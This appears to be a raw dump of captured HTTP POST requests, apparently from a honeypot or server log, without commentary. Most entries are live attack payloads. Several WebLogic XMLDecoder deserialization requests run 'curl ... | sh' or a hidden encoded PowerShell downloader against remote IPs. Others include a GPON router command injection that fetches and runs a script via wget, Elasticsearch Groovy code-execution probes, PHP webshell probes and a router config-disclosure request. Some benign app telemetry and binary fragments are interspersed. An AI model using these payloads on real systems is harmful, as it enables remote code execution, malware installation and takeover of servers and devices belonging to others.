User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache

Vg21znQRUuXPfgHvI1iYo+b1b22QYNH+oYLx7QegrxN3ccoiKy7Mywn+9Dig4Sb8MZnlhHwbZGmKtNsLpgZMJKqlSMpxg50p7IWCOHawy0Vmrfep3CI+WJvB1Fsb+09o+UAkfvAUwpiGCZPuwyx6fKk+LvkjuxT+rK9HS5WPZSU1AlO47k0Kcjsi4qVgKPgGrjihbejxDNc3NEyNKZaK9cgV79vReyklaiv9dFDkjHS3M1B7MC7gpiB9FASaEFxNQzocz8tvdkqTVNX4m4HyVimo+VycIEtAnL/yD1rYT6JAIfkQm9SV44sW1pRWU38DIXH//vgDQ5dGSobV6u3DDg9lTXJoiWUs3fbj4+qA

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 167
Content-Type: application/x-www-form-urlencoded

{
			"script_fields": {
				"myscript": {
					"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"hostname\").getText()"
				}
			}
		}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

662978
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

ee45257eecb4c9c565915513d7918a17
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Wï◊lÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

RfRclNvAYSp1Eb6SwHqcYf7+Pbi1RR4tiGb/mSheNo8PnCYvEF4Ns9cGoMTmsssUyrE1nu8troBVd96EwhAvicL+W9LOHamoChUZTPfyj1/3VIzhzBuHE1HGZqHCMBYGqXVO8xVMbJlt8LrXz8dRqZXngL9YOghtGqBliE/uym+/oCooXFqF/ie4DZZA/xHM69VILOrHhPGPBYVtWJ9bakJYCRCg3zmVhFv7aKeer7qC1/E+cG9+jyusAgzVGUP1EHeBIdsZXrFrVdKwpqDFNadfVxFtKCscNhJLBr5nHMW3wo/hVQRzGywTuOHXtwJT3A5uWtQAtcPnXVLjdedFgtX0nJ3Eb0gjasa0PPsk9J+Zf/KWHPjywGbVEQ==

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1055
Content-Type: multipart/form-data; boundary=1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

364715
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

f9641825392e158e2acdb5a33045e1ad
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR--


POST http://check.proxyradar.com/azenv.php?auth=152313065485&a=PSCMN&i=1082785710&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=ETRD177ET

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

QKVfxtmZbcASRoYO/UsP+a9rpQtipDSFv7jBMGSG88JNZenrBsu3aqHaCFEYyeeg9hxdxd1h+YIIuGztM+jX/LhlUmhB4WmilDMjxj5yWk3sDLffW1LrnUcpV3noyk8BhwgMhtizwL268ayZpoDdO2sQi8MJxjhhWKhQgzJ6zlUZTpxegkuHy+7ryamaSEpu8jHKZSUVrBAVB8HEdpUu6hftUT1/a3Sk4kvU2Gi/d67BXeD2UO64zWNmEdbhRezoDlbIQGCA4CGIBxCqXRj6z7t3V40JjmnOaMRPfyg3Py5RqPBczOJOizOoz4jllMPxCr861fK4+84SwTlMX6vONuTmCFTvvIG5wcEeSoIhTGTklDSnSId1B8tNsBZk

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

F6wNkN2ZZKZzcLyUBvbDHyVIwTp+9g3s+jfGxc/ofhk3BvtTXa4hn323TVojIYICT5bOOa0IlQOFbUOosHkW2SbqRy5S1s94qVz7FEEmGwZdYSMyjNv/9cKiYUN8WQzNDTveS/O2A2tGTAhhlb+FJOZV/n63l48/LnDam8NfzdkpbWpGvbHr+g1VKLSOJ3uiExWDKNyawmDOjo3uWlrZ7w9anwTOuRAScpP4A/TzASLg/Dw57L/wNfV4mPpt+nCltKBq8q0grup+qX+Cy/HPQhGLCBbzYmzx1KOnnaWZExTMNVbsNCJ0hsIP8IZmJuGUKd8LcePeevtZ9IuPQcnFg5u9GBqxVlzhfWbzidAyLJmEIW9swZpbT/lW8VZW02//9r53xwiydqlOnH4k9bqDcw==

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149538644099&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache

AF+zn3xAUXrGdISGyEUaS/63DojyYqVze4hANwIrAgQw2HVzbJI2D33z9WJVyarwLkU0P1mnQodj4IuIjpyESzKHdDSgtAOFw0FICa6VvDufyJFifSu7hwUWf/YqL8RXo3wqixkeTprq+j4ecT5t72DnerHlFdgewyRui1kVqTulectcyLYtwBsJjZitXIfpLUBFfY3FV+iWClsotmSWw7+v3Kr6UuBpelvBiwO80vYd5vF8K/GCbjUE9M/z1rGhASl7uwdemD6QzRml3yeglJxjESMdnFK7M2LyD5IvH8vjHw78ukxW5Pdmixzwf6xjrcurELqCNVAuFiW3f2YWC1sGPtmKkmndHwHAYx8wxE4tv4joXoz/8NB1C5FMg+fLzwixC/HV5UpsYBUjPbpk

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

EKNYyd/AYJdOSbVBcr0zIs8/xZpT+F9nVAz+Bhcoln2pXeQY0cTstscKhrfoTgd0whMByvaWLvKp6U5DcwT9gwT/MQGoWTJccSl2O12BWhRZXqkMTg20x1WfT7i75BwGeSg2qgI6aszAAxJ9jTYu3VD6aTrGUvHN2UBnmREHzMd6M/oypHJaKs1aqWvuu5jM+oWms37zuiAemhKW4F0tQaiWF9uZANPU/lMTSax2DD8NzcU+lfCmlWB1qTeQgL/H5uqS+35qU1MHE+6Tk0+ZM35m1Bhi3TlW0f3r72k5bHtdkoOf+CVjl9BYldnmFgK4t+LhSxybyBGjzY2rT0bmAAi+Z7Aex1fBUz57LC2dJAT8iwWdzd0=

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache

RvYKwozANsKNTz9RhRa4DOZY7KtYhQOflRNJHF1G0eueDAYmjjsj3Racf2t/H22OestMovkxPilv92blwhGNg9DxKXHicsH0yluDlomLVA0PSkMjFOkHqNbhuvzajZwB5okXwHrCUVdRvaZsqeMAR5iyj69zPcFEoTNm9VLlqPJ1abWisJ5ItDf6fhuPLuU9rqMNbHl7NSqL4Il3VKhm6PlNFNktR5PV3KKWzx3+HjEFZkV7N1KdCODHD8iGyyhQqy+V63od1RogDebdtW6lnwND18Tvm59eayU0F5pdVCERYmk7z64gxwU7AUx4WrhVA7UlqUFl5eWIJMslkO8hnD0iVGOSsR4sGM7UNOr7k6xpmjgUozaGEv5frzCtei1ahsMpuTciksRRn8NDRBxp0AjKO3lXe9NK3OCm0cFNa4GzXIH8au1bFgk=

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1045
Content-Type: multipart/form-data; boundary=MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

597225
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

4b14b82d13659820ac222726501107f5
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
:µÃ©Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Wï◊lÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die((string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

RaxfxtvLMD8LhyRQ4Ja0XT9tiRJULMs/hkS6xVToknRPG7ZnoFUZy9SCxTnzxRnLzn9vvZLGUiXl343dBQ/96cqczM/fa2YkidCsjm78vpzQ4sTnRoBeQb3LoK2yhFNxncTWO7YGWbjbJkT+AD22MJKSVPVxwZDkbvq+IIR56UIsjDPd2gRPCY8702Z4ldcGnkbadnNloCstRADLCpl+XtnjHVbuJoqZl/yKzZgJKyTVEifg4Z7lUNPiDxK85bpc581zDzdlY8k/l77YwIRrx2KJyYZ9xunm8te1V62PVPvdxb5CBWFkzEEJVEVFdTAMcxGuFbs19Q9ppur9DIAWKSKKJ5LIPsffDG8SZSiIvcPvcQlt6PxSNIQj6Faxi1LlSByT

POST http://check.proxyradar.com/azenv.php?auth=149134299065&a=PSCMN&i=1082764042&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 558

.:"g
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjb¸#AE|HÅn˝Öä-¢;W´X'ª∫ïÃû?Êtú§~_g»j±euï¥_∆ƒæƒØâm›
^»ï”Ëz(∑ÅtπRK}£íÊ|?ó.»µ-BA¢ëf –◊éZpo@ΩóXÂ*6H6ˆBO˛gÄjí"¡êpH/¬ï(O&ög\»:nÌ(∑^5¨1¨+Vjß-q˜•kØ=˘•2V‘
PÄÆ6*ÎcÆéÊv…Qûî\ºÚíˆ<≤PÊ∞ê⁄´u◊†Ë≠z›ÊÔÛiê/˙¥ä∑√íÜfè3Nbò”gò≠–¶tT∏∑®÷g®˝´PìÆæÃe(˙SÌÀ`›´–ÚÄëi6!˝’É¢˝|Ô¥ÇÓ‹€ÓJL‡LÒóπ…	Å˝ßä≥–ãDâ¡¥≈3äæi£øËaÙ9Z¸¢ë3~ª’X<Ôºm‚°jPnèÈÕ8\Âı?#°†"Ë⛶Âm∞≠iTé\M¥>ŒÁ\òô¸6gùè∆∞¶Ú·E˙´ÙV?>éÃ	(≥’í~!èÔ€Q:ÃÉúªD*Eb̸£’«>k≤Iï∞îgGÜ∏gãzv9!Üf>w
îËr‰“9<ò®ßbjóÊ–˚VŒœè·˝»0¨∞ÙÈÌã÷üÄ2€nã]√∏»ö™˘Õl‘cÃvhÄÀò)F≥÷àùî


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÜôOÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache

RvMLktLBYexuG+2IsAK6l2Rzwt7iXShVIo3/nZJvU271dlUNUqLnELBQdE4tuAr8ezmvLZ83dfcMpc5ediDZCV+9pVK5n04OGiHYdUehH5kXKZpYXfFYETbN9/LbQRhQ0pZC03NpMokI8OVX8WeWFcgHoyl0hSYtG8i9qV3RbVtD45J6jPqZ1kwAIwTu1xeKfHjp5BbnXC0BtwyuEe8hJ+TG31uLtaKym7nw76JoAaYnn4dRKB7SJXvCKjrqe7AXi05y5ll5ov9Kpk9EJxmPS+IHhi+3BYQwU/Gt8iOKWHpsbXeo2nnXpww/UDcbi7+8UQc60pHx+kKThaRj5NeRkloTnAut8hwQaN3+hwZ6K9gOddS+3Upz6NtSXSKK6/pO

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

